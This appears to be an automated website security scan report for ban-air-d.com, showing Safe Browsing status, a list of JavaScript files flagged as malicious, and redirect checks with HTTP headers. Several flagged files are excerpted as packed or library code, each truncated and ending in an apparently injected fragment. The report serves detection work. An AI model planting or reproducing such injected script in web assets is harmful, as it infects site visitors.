Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ban-air-d.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ban-air-d.com/ | 200 OK Content-Length: 30027 Content-Type: text/html | clean |
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/mootools/mootools-release-1.11.js | 200 OK Content-Length: 51156 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o ci={cj:\'1.11\'};k $77(N){m(N!=9N)};k $F(N){B(!$77(N))m O;B(N.5i)m\'G\';o F=7c N;B(F==\'2I\'&&N.ch){22(N.84){Y 1:m\'G\';Y 3:m(/\\S/).2v(N.ax)?\'cg\':\'cd\ if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/media/system/js/caption.js | 200 OK Content-Length: 1720 Content-Type: text/javascript | clean |
http://ban-air-d.com/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 10995 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 1B=2 1E({1v:5(t,4){1.1w({1h:\'c...\',16:\'Y\',13:\'1U.1V\',18:\'1T.c-9\',17:\'h.f\',1j:\'15 e\',1g:\'15 A\',1m:\'1P e 1Q\',1G:\'1R e\',m:\'1W.1X?22=23&21=20&a if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/modules/mod_yoo_carousel/mod_yoo_carousel.js | 200 OK Content-Length: 10183 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('C I=h n({1r:5(d,3){2.o({1b:n.t,Y:n.t,1l:n.t,11:n.t,10:\'.s\',13:\'.1g\',17:\'.a\',16:\'.a-6\',Z:\'.a-1s\',X:1q,1j:1t,z:\'x\',K:0,D:\'1u\',N:\'1v\',M:\'19\',k:1p,9:\ if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 42178 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof MooTools=="undefined"){throw"Unable to load Shadowbox, MooTools library not found."}var Shadowbox={};Shadowbox.lib={getStyle:function(B,A){return $(B).getStyle(A)},setStyle:function(D,C,E){D=$(D);if(typeof C!="object"){var A={};A[C]=E;C=A}for(var B in C){D.setStyle(B,C[B])}},get:function(A){return $(A)},remove:function(A){A.parentNode.removeChild(A)},getTarget:function(A){return A.target||{}},preventDefault:function(A){new Event(A).preventDefault()},addEvent:function(C,A,B){$(C).addEve if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/addons/base.js | 200 OK Content-Length: 11049 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4 1U={1V:5(1G,X,W){4 k=0;4 x=[];4 O=1G.26(" ");4 1E=O.27();4 16=\'\';O.h(5(f,i){16+=\'.1e("\'+f+\'")\'});$1Z(1E).h(5(B,i){25(\'x.24(B\'+16+\');\')});x.h(5(b,i){8(!$ if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 8602 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 t=6 v({w:4(q,p,2){0.x({r:\'m\'},2);0.7=q;0.9=p;y(0.2.r){A\'z\':0.j();C;m:0.g()}},g:4(){5 2={};e(!$n(0.2.8)&&!$n(0.2.c)){2={c:-1}}$k(0.7).l(4(3,i){e(3.o(\' if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/addons/fancymenu.js | 200 OK Content-Length: 10080 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n 1a=c T({1v:7(d,6){3.K({1A:1B.1t.1C,O:1o,1E:I,1e:T.1i,e:1,f:\'y\',1b:1h,Y:[\'1f\',\'1l\',\'1m\',\'1r\',\'1q\',\'1p\',\'1s\',\'1n\'],W:\'5.1g\',V:\'5.X\'},6);3.d=$( if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 8589 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 g=f q({u:6(e,7){9.x({i:\'w\',y:s,B:h.v.A,z:r},7);2 3={\'8\':0,\'a\':0,\'b\':0};t(9.7.i){j\'8\':3={\'8\':0,\'b\':0};m;j\'a\':3={\'a\':0,\'b\':0};m}$$(e).M(6(4){2 1 if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/yoo_tools.js | 200 OK Content-Length: 15795 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var YOOTools = { start: function() { YOOTools.setDivHeight(); new YOOAccordionMenu('div#middle ul.menu li.toggler', 'ul.accordion', { accordion: 'slide' }); new YOOFancyMenu($E('ul', 'menu'), { mode: 'move', transition: Fx.Transitions.Expo.easeOut, duration: 700 }); new YOODropdownMenu('div#menu li.parent', { mode: 'height', transition: Fx.Transitions.Expo.easeOut }); switch (YtSettings.color) { cas if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/index.php | 200 OK Content-Length: 30027 Content-Type: text/html | clean |
http://ban-air-d.com/index.php?option=com_content&view=article&id=113 | 200 OK Content-Length: 13263 Content-Type: text/html | clean |
http://ban-air-d.com/test404page.js | 404 Not Found Content-Length: 275 Content-Type: text/html | clean |
http://ban-air-d.com/index.php?option=com_content&view=article&id=114 | 200 OK Content-Length: 13128 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ban-air-d.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 08 Jul 2014 07:59:53 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 08 Jul 2014 07:59:53 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 748d2e58c1df2e71aef9c0503f002ccb=ee16s79msbvfll9s9l5cfjg3f7; path=/
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: ban-air-d.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 08 Jul 2014 07:59:53 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 08 Jul 2014 07:59:53 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 748d2e58c1df2e71aef9c0503f002ccb=ee16s79msbvfll9s9l5cfjg3f7; path=/
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: ban-air-d.com
Referer: http://www.google.com/search?q=ban-air-d.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ban-air-d.com
Referer: http://www.google.com/search?q=ban-air-d.com
Result:
The result is similar to the first query. There are no suspicious redirects found.